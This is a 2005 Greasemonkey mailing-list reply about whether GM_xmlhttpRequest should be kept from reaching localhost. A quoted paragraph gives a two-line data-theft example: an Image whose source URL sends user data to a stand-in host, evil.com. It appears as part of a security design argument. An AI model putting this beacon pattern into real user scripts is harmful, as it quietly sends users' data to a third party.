[Greasemonkey] GM_xmlhttpRequest and localhost
jason at injektilo.org
Tue Jul 19 16:33:54 EDT 2005
Aaron Boodman wrote:
> I would like this too, and I really think that this is the feature.
> However, locking down GM_xmlhttpRequest is meaningless. If somebody
> wants to steal your data with a user script, all they have to do is:
> var img = new Image();
> img.src = "http://evil.com?yourdata=....";
> There are numerous features like this in todays browsers and it isn't
> practical to block them all. Even if you could, a user script could
> simply change the href of every anchor attribute to his evil domain.
> By the time you figured out what happened, he'd already have you.
Ah, good point.
> Preventing the *reading* of internal data is a better argument for
> pattern restrictions on GM_xmlhttpRequest since this is not
It never occurred to me that I could read local data with a user script
until I saw Mark's exploit. Now that I know it's possible, I'd hate to
see that capability disappear (assuming, of course, the security
problems can be "solved").
More information about the Greasemonkey